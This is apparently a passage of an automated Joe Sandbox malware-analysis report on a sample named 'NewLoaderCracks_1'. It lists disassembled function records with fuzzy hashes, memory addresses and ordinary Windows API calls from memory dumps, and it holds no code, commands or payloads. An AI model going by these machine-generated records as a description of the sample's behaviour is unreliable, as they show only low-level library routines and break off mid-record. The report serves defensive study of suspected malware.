                • Instruction ID: c21c4918da97dbebf6d28eb5df7fb9ba2210cd857968ba37abde9cd2a92451ed
                • Opcode Fuzzy Hash: b0d59ca21c3c769606199f08a66a67a8f5ac631901157785394110dfddcc2af1
                • Instruction Fuzzy Hash: 1FC1C170A04A449FEF15CF68C888BE97FA5FF46318F0844B9DC459B286CB319D84DB69
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 967b1eb18aa7fdcb8a6187dc4bd443b0c3e9384fbd8934288a88b7fb3be2bbd6
                • Instruction ID: e72252529e34a13b25be2cb810fe791bfa94b4fa1152ba7e8234e7905ba6a467
                • Opcode Fuzzy Hash: 967b1eb18aa7fdcb8a6187dc4bd443b0c3e9384fbd8934288a88b7fb3be2bbd6
                • Instruction Fuzzy Hash: B4711070500F45AECB25DB30CC95AE7BFE8BF54305F44482EE5AB47252DA316A48CF10
                APIs
                • __EH_prolog.LIBCMT ref: 00548384
                  • Part of subcall function 00541380: __EH_prolog.LIBCMT ref: 00541385
                  • Part of subcall function 00541380: new.LIBCMT ref: 005413FE
                  • Part of subcall function 005419A6: __EH_prolog.LIBCMT ref: 005419AB
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: a3d3495cc1f606dbbd338cb58041c44b710386080464cf554b6dc63d2e672f2e
                • Instruction ID: f9e8942802da7c134dcb134add8c03ad5a60b5aaa74052dd0eb980e9856770eb
                • Opcode Fuzzy Hash: a3d3495cc1f606dbbd338cb58041c44b710386080464cf554b6dc63d2e672f2e
                • Instruction Fuzzy Hash: 754183319406559ADF24DB60C859BFE7BB8BF90308F0444EAE58A97092DF745AC8DB50
                APIs
                • __EH_prolog.LIBCMT ref: 00541E05
                  • Part of subcall function 00543B3D: __EH_prolog.LIBCMT ref: 00543B42
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: d27f9fadf331dc7110eeb65a5c797d5d717b888196810814562dffdc353e43bb
                • Instruction ID: b47432679cb45fafb6926985245852a1bb6ab9e152727fad62950f3fb48d93cd
                • Opcode Fuzzy Hash: d27f9fadf331dc7110eeb65a5c797d5d717b888196810814562dffdc353e43bb
                • Instruction Fuzzy Hash: 592159319045099FCF11EF98D955AEEFFF9BF98304B10046EE845A3251CB325E54CB68
                APIs
                • __EH_prolog.LIBCMT ref: 0055A7C8
                  • Part of subcall function 00541380: __EH_prolog.LIBCMT ref: 00541385
                  • Part of subcall function 00541380: new.LIBCMT ref: 005413FE
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c4aa395e13df6ce71a91139a36b2c8d0b598c8ebbeac28566e4c0d17dc000a0a
                • Instruction ID: c832b5b9c05302c6953f99671f237cdc50f0734ccd109d3e8d64cabe532b749a
                • Opcode Fuzzy Hash: c4aa395e13df6ce71a91139a36b2c8d0b598c8ebbeac28566e4c0d17dc000a0a
                • Instruction Fuzzy Hash: EC216D71C0424AAACF15DF54C9569EEBBB4BF59304F0005AAE809A3202DB356E4ADF65
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 54f8a7968311b760f2ebf3ffacca85499a95878601a60203ad6a2b3092cafb8d
                • Instruction ID: 57fac2ab3668e127bbc00959b45b0291b81b2a4ba2b3e5616cc09fd91292aa1e
                • Opcode Fuzzy Hash: 54f8a7968311b760f2ebf3ffacca85499a95878601a60203ad6a2b3092cafb8d
                • Instruction Fuzzy Hash: 93118E73E015299BCB26AFA8CC5A9DEBF36BFC9754F004515F808A7251CA348D1086A0
                APIs
                • __EH_prolog.LIBCMT ref: 00545BDC
                  • Part of subcall function 0054B07D: __EH_prolog.LIBCMT ref: 0054B082
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: e891106540cb85c358b344edbf2828c95ff424c936f0a4ba70c7a97771401a1f
                • Instruction ID: acd943ac0000310e6f3238f05a8a607cb009c2bf36310e30e96bcfef0369eaf9
                • Opcode Fuzzy Hash: e891106540cb85c358b344edbf2828c95ff424c936f0a4ba70c7a97771401a1f
                • Instruction Fuzzy Hash: E701AD30A04685DAC725F7A8D0193DDFFA8AF59309F40809EA85A13283CBB01B08C762
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0056C13D,00000000,?,005667E2,?,00000008,?,005689AD,?,?,?), ref: 0056854A
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: d1e17ede1c9cbd1d2aadb4af00423740b33e38110bae173dc68361942b1fed49
                • Instruction ID: f27121120151e03a329995578601c290a42ab0ad174f6d15b1580c944bafe8fc
                • Opcode Fuzzy Hash: d1e17ede1c9cbd1d2aadb4af00423740b33e38110bae173dc68361942b1fed49
                • Instruction Fuzzy Hash: 40E0E5316406227BEB312A699C04B7A3F8CBFB13F0F140710AD1AA3191CE20CC0495EA
                APIs
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0054A4F5
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 5157d7df5190da4c77372eed0f0d6880c3b9df751e0ab4acaea54ce4e70fc0dd
                • Instruction ID: e4915ee164954172f6f4408fe3f8a331fe78e691cb12ef353aedf0ba269266ce
                • Opcode Fuzzy Hash: 5157d7df5190da4c77372eed0f0d6880c3b9df751e0ab4acaea54ce4e70fc0dd
                • Instruction Fuzzy Hash: 03F0B431048380AACEA25B7848087CB7F917F55335F04CA09F1FD02196C27454859723
                APIs
                • SetThreadExecutionState.KERNEL32(00000001), ref: 005506B1
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: 3baac9bdd70caf73f3ed3d503473e0cdfaac345e91b0bd05c715131acd11f532
                • Instruction ID: 5a11cd7949e44c661fbb33487809a8750973459015a25e8324989d22b82c4780
                • Opcode Fuzzy Hash: 3baac9bdd70caf73f3ed3d503473e0cdfaac345e91b0bd05c715131acd11f532
                • Instruction Fuzzy Hash: A3D02B3020001265CB213325A86E7FF2E4A2FC3722F0A1063BD0D275C38B46088E63E3
                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 00559D81
                  • Part of subcall function 00559B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00559B30
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction ID: f5c37747748812bd66d903731468961c69ddd3028c65e2f6b1a4fb80f8cfa836
                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction Fuzzy Hash: FBD0A73021820EFADF44BA708C2397E7FB8FB40311F004027BC0986141ED71DF14A261
                APIs
                • GetFileType.KERNELBASE(000000FF,00549887), ref: 00549995
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: 5e27933e5d5c1c1471a23f648a41e0c02bbba93ac054c2d73e94738f40c4a002
                • Instruction ID: 6288fe08817826e9c1e17b184c6e8dd6a3188ac2417b963870df0f05dafb5aed
                • Opcode Fuzzy Hash: 5e27933e5d5c1c1471a23f648a41e0c02bbba93ac054c2d73e94738f40c4a002
                • Instruction Fuzzy Hash: 87D01231011181958F2586345D0B0DB7F51EB8337EB38C6ACD065C40A1D733C843F542
                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0055D43F
                  • Part of subcall function 0055AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0055AC85
                  • Part of subcall function 0055AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0055AC96
                  • Part of subcall function 0055AC74: IsDialogMessageW.USER32(00010408,?), ref: 0055ACAA
                  • Part of subcall function 0055AC74: TranslateMessage.USER32(?), ref: 0055ACB8
                  • Part of subcall function 0055AC74: DispatchMessageW.USER32(?), ref: 0055ACC2
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 7cc06e05504cef736862512bfe9cb86cdf8857c77214fa3c3ce92c0ca37747bb
                • Instruction ID: 51f02bbbf1a747dfcc2713ed84f88d72b2909d53b34853acffd35014cc66ff0e
                • Opcode Fuzzy Hash: 7cc06e05504cef736862512bfe9cb86cdf8857c77214fa3c3ce92c0ca37747bb
                • Instruction Fuzzy Hash: 78D09E32144301ABDA122B51CE07F1F7EA6BB98B09F404654B744740B186629D24EB16
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c8719990986a218fe2cffa61e6fe7c1e7a475ba27da392a1b9a1e7f334636884
                • Instruction ID: 3c49bd334c5292085da359d426dbbd8e8a669d2faaf4fd13d5ddfff1932040cf
                • Opcode Fuzzy Hash: c8719990986a218fe2cffa61e6fe7c1e7a475ba27da392a1b9a1e7f334636884
                • Instruction Fuzzy Hash: 78B012E326C002AD312862087C6BF3A0E6CF8C2B53330C41BBD0DD00C0D4405C0D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9abe904ef03fddb7faef130cd72282c01e610ec345fe22668aed671f477e65b1
                • Instruction ID: f8c6fa839900387c33471e20c44ce1bedd2d0e399fd2856474768f6fac3e4e08
                • Opcode Fuzzy Hash: 9abe904ef03fddb7faef130cd72282c01e610ec345fe22668aed671f477e65b1
                • Instruction Fuzzy Hash: CCB0129326C102AD316862087C6BF3A0E6CF8C1B53730C51FB80DD01C0D4405C8D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 064e45e20c4b8754c02afac1671afb3e8dec7c196bc847300506e741d2416184
                • Instruction ID: 8f8fc1fa9b1246f506a7af76fec461ef0c194388cd489647f52ee31ab0e61083
                • Opcode Fuzzy Hash: 064e45e20c4b8754c02afac1671afb3e8dec7c196bc847300506e741d2416184
                • Instruction Fuzzy Hash: 11B092922A8002AD31286208696AA3A0A68E8C1B52320841BB809D0180D440580E5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: eb2640d1cd26092af53178356a58b0342c392a220112a79e9594f6cee014c136
                • Instruction ID: d9e902f21a33d0971b049520258f5ce257ac4c5fedcc852fff4722bebb895e68
                • Opcode Fuzzy Hash: eb2640d1cd26092af53178356a58b0342c392a220112a79e9594f6cee014c136
                • Instruction Fuzzy Hash: A2B012E336C002AD312C62087D6BF3A0E6CF8C1B53330841BBD0ED00C0D4405D0D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9770f2af78ece74d7458117487ea65699f1eb70fed81e95adbd9b719a94777ae
                • Instruction ID: 86264759244063b70e880d983a8552017db67f5cb1606ae4dbd1bc34675e673a
                • Opcode Fuzzy Hash: 9770f2af78ece74d7458117487ea65699f1eb70fed81e95adbd9b719a94777ae
